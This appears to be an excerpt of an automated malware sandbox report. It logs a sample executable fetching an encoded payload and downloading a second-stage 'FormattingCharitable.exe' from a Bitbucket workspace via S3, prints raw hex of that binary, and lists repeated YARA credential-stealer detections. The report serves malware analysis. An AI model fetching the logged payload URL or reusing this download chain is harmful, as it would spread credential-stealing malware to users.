                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nl0CIqsY%2BFQC6BiEP1CNp5DI4of%2Br7e8OtgTNqr43JnQ0ysvgvC3yif1aNX5WoEvpu0gNkBHQD2wTFtKOUeRQkFKxsZ0mIBYx%2BZDGyX8hWisXa9RihesKkZ4L8cToX7oI7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a7619ef1420d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1819&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1605277&cwnd=244&unsent_bytes=0&cid=c9e496c8545d5b60&ts=774&x=0"
                                                                                                                                                                              2024-12-23 07:31:46 UTC198INData Raw: 63 30 0d 0a 37 59 75 50 74 77 50 65 78 44 52 77 69 32 6e 33 70 34 6c 64 38 56 34 49 30 6a 69 44 30 35 48 66 75 35 75 64 62 48 5a 31 79 4c 61 32 38 4b 33 43 49 65 54 6d 58 41 54 2f 47 59 53 64 31 58 4b 74 63 57 71 37 54 4f 47 6d 38 72 54 65 37 37 4d 44 42 42 4b 55 6d 59 44 79 34 64 4a 30 71 61 74 47 47 2f 67 5a 6c 73 54 73 62 4d 4e 74 4f 2b 4d 4b 33 2f 7a 69 76 4e 58 2f 77 55 4d 53 47 72 2f 59 67 65 54 75 30 33 43 43 36 33 49 66 2b 51 53 57 30 2f 30 30 6e 7a 6c 4c 75 6c 6e 78 75 75 57 2b 32 66 66 34 51 68 4d 4e 72 5a 54 42 71 65 6e 44 49 65 54 30 47 46 4c 75 53 38 32 57 39 41 41 3d 0d 0a
                                                                                                                                                                              Data Ascii: c07YuPtwPexDRwi2n3p4ld8V4I0jiD05Hfu5udbHZ1yLa28K3CIeTmXAT/GYSd1XKtcWq7TOGm8rTe77MDBBKUmYDy4dJ0qatGG/gZlsTsbMNtO+MK3/zivNX/wUMSGr/YgeTu03CC63If+QSW0/00nzlLulnxuuW+2ff4QhMNrZTBqenDIeT0GFLuS82W9AA=
                                                                                                                                                                              2024-12-23 07:31:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.1049769185.166.143.494437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:47 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bitbucket.org
                                                                                                                                                                              2024-12-23 07:31:48 UTC5943INHTTP/1.1 302 Found
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:48 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWo [TRUNCATED]
                                                                                                                                                                              Expires: Mon, 23 Dec 2024 07:31:48 GMT
                                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                                              X-Served-By: e253b34248ef
                                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                                              X-Request-Count: 884
                                                                                                                                                                              X-Render-Time: 0.07326650619506836
                                                                                                                                                                              X-B3-Traceid: a711a345df084811a9c44ef7fa39b262
                                                                                                                                                                              X-B3-Spanid: 2f51f8942aed4d54
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED]
                                                                                                                                                                              X-Usage-Quota-Remaining: 999034.004
                                                                                                                                                                              X-Usage-Request-Cost: 986.83
                                                                                                                                                                              X-Usage-User-Time: 0.023771
                                                                                                                                                                              X-Usage-System-Time: 0.005834
                                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                                              Age: 0
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                              Atl-Traceid: a711a345df084811a9c44ef7fa39b262
                                                                                                                                                                              Atl-Request-Id: a711a345-df08-4811-a9c4-4ef7fa39b262
                                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                              Server-Timing: atl-edge;dur=184,atl-edge-internal;dur=4,atl-edge-upstream;dur=182,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                              Connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.104977552.217.136.894437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:50 UTC1352OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWou94jMnJQS46uxs8Ju0vMuJyGP%2Fm9Pv%2B9rjrr05WM [TRUNCATED]
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                              2024-12-23 07:31:50 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                              x-amz-id-2: 7gOx00Z8Ctw7gg8POxX541x8xBLcZcS4LcLXnjBx7cnqknhLvNHcrf0iGLYGTkIQkOZv0gfkuxY=
                                                                                                                                                                              x-amz-request-id: PXTKA8RFGS3SE8AX
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:51 GMT
                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-12-23 07:31:50 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                              2024-12-23 07:31:50 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                              Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                              2024-12-23 07:31:50 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                              Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                              2024-12-23 07:31:50 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                              Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                              2024-12-23 07:31:50 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                              Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                                              2024-12-23 07:31:50 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                              Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                              2024-12-23 07:31:50 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                              Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                              2024-12-23 07:31:50 UTC9000INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                              Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                              2024-12-23 07:31:50 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                                              Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
                                                                                                                                                                              2024-12-23 07:31:50 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                                              Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:02:31:19
                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\mG83m82qhF.exe"
                                                                                                                                                                              Imagebase:0x410000
                                                                                                                                                                              File size:2'982'400 bytes
                                                                                                                                                                              MD5 hash:B51D856B18ECFAD7B127881F7819409B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455318191.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454724980.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456122443.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1454957001.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455686356.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1455516828.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1456773192.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
